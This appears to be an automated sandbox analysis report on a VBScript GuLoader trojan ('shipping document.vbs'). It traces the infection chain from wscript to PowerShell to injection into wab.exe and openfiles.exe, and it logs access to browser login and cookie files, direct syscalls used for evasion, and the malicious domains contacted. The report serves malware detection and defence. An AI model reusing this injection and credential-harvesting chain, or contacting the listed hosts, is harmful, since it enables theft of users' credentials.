        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F32A mov eax, dword ptr fs:[00000030h]12_2_2023F32A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20207330 mov eax, dword ptr fs:[00000030h]12_2_20207330
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029930B mov eax, dword ptr fs:[00000030h]12_2_2029930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029930B mov eax, dword ptr fs:[00000030h]12_2_2029930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029930B mov eax, dword ptr fs:[00000030h]12_2_2029930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h]12_2_2024A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h]12_2_2024A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h]12_2_2024A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C310 mov ecx, dword ptr fs:[00000030h]12_2_2020C310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20230310 mov ecx, dword ptr fs:[00000030h]12_2_20230310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF367 mov eax, dword ptr fs:[00000030h]12_2_202CF367
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217370 mov eax, dword ptr fs:[00000030h]12_2_20217370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217370 mov eax, dword ptr fs:[00000030h]12_2_20217370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217370 mov eax, dword ptr fs:[00000030h]12_2_20217370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B437C mov eax, dword ptr fs:[00000030h]12_2_202B437C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h]12_2_2020D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h]12_2_2020D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5341 mov eax, dword ptr fs:[00000030h]12_2_202E5341
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209353 mov eax, dword ptr fs:[00000030h]12_2_20209353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209353 mov eax, dword ptr fs:[00000030h]12_2_20209353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov ecx, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DA352 mov eax, dword ptr fs:[00000030h]12_2_202DA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h]12_2_202433A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h]12_2_202433A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202333A5 mov eax, dword ptr fs:[00000030h]12_2_202333A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h]12_2_2020E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h]12_2_2020E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h]12_2_2020E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023438F mov eax, dword ptr fs:[00000030h]12_2_2023438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023438F mov eax, dword ptr fs:[00000030h]12_2_2023438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E539D mov eax, dword ptr fs:[00000030h]12_2_202E539D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20208397 mov eax, dword ptr fs:[00000030h]12_2_20208397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20208397 mov eax, dword ptr fs:[00000030h]12_2_20208397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20208397 mov eax, dword ptr fs:[00000030h]12_2_20208397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2026739A mov eax, dword ptr fs:[00000030h]12_2_2026739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2026739A mov eax, dword ptr fs:[00000030h]12_2_2026739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF3E6 mov eax, dword ptr fs:[00000030h]12_2_202CF3E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationProcess: Direct from: 0x77542C5C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenKeyEx: Direct from: 0x77542B9C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateFile: Direct from: 0x77542FEC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenFile: Direct from: 0x77542DCC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryInformationToken: Direct from: 0x77542CAC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryValueKey: Direct from: 0x77542BEC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenSection: Direct from: 0x77542E0C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationThread: Direct from: 0x775363F9
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQuerySystemInformation: Direct from: 0x775448CC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtClose: Direct from: 0x77542B6C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtReadVirtualMemory: Direct from: 0x77542E8C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateKey: Direct from: 0x77542C6C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtSetInformationThread: Direct from: 0x77542B4C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryAttributesFile: Direct from: 0x77542E6C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtOpenKeyEx: Direct from: 0x77543C9C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateUserProcess: Direct from: 0x7754371C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQueryInformationProcess: Direct from: 0x77542C26
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtResumeThread: Direct from: 0x77542FBC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtWriteVirtualMemory: Direct from: 0x7754490C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtDelayExecution: Direct from: 0x77542DDC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtReadFile: Direct from: 0x77542ADC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtQuerySystemInformation: Direct from: 0x77542DFC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtResumeThread: Direct from: 0x775436AC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtNotifyChangeKey: Direct from: 0x77543C2C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtCreateMutant: Direct from: 0x775435CC
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe NtMapViewOfSection: Direct from: 0x77542D1C
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and write
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: read write
        Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\openfiles.exe Thread register set: target process: 4944
        Source: C:\Windows\SysWOW64\openfiles.exe Thread APC queued: target process: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A00000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 270F958
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (same command line as the powershell.exe created by wscript.exe above)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
        Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\openfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Gather Victim Identity Information | 321 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 321 Scripting | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
        | Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 411 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 11 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 21 Security Software Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 411 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
        | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph ID: 1430120, Sample: shipping document.vbs, Startdate: 23/04/2024, Architecture: WINDOWS, Score: 100
• DNS/IP: www.ordinarythoughts.org; www.mz3fk6g3.sbs; 4 other IPs or domains
• Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures
• wscript.exe (started)
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
  • WmiPrvSE.exe (started)
  • powershell.exe (started)
    DNS/IP: drive.usercontent.google.com, 142.251.35.161, ports 443, 49707, 49716, GOOGLEUS, United States; drive.google.com, 142.251.41.14, ports 443, 49706, 49715, GOOGLEUS, United States
    Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
    • conhost.exe (started)
    • cmd.exe (started)
    • powershell.exe (started)
      Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
      • cmd.exe (started)
      • wab.exe (started)
      • wab.exe (started)
        Signatures: Maps a DLL or memory area into another process
        • NJeXDhPqkKUqTApfiOc.exe (injected)
          Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
          • openfiles.exe (started)
            Signatures: Tries to steal Mail credentials (via file / registry access); Creates autostart registry keys with suspicious names; Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
            • firefox.exe (started)
            • NJeXDhPqkKUqTApfiOc.exe (injected)
              DNS/IP: www.a-two-spa-salon.com, 157.7.107.63, ports 49720, 49721, 49722, INTERQGMOInternetIncJP, Japan; www.jthzbrdb.fun, 80.240.20.220, ports 49719, 80, AS-CHOOPAUS, Germany
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
• wab.exe (started)
• wab.exe (started)
• rundll32.exe (started)

Source | Detection | Scanner | Label | Link
shipping document.vbs | 32% | ReversingLabs | Script-WScript.Trojan.Guloader |
shipping document.vbs | 40% | Virustotal | | Browse

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
www.a-two-spa-salon.com | 0% | Virustotal | | Browse
www.jthzbrdb.fun | 3% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://www.microsoft. | 0% | URL Reputation | safe |
http://www.microsoft. | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.a-two-spa-salon.com | 157.7.107.63 | true | true | | unknown
drive.google.com | 142.251.41.14 | true | false | | high
drive.usercontent.google.com | 142.251.35.161 | true | false | | high
www.mz3fk6g3.sbs | 172.217.16.36 | true | true | | unknown
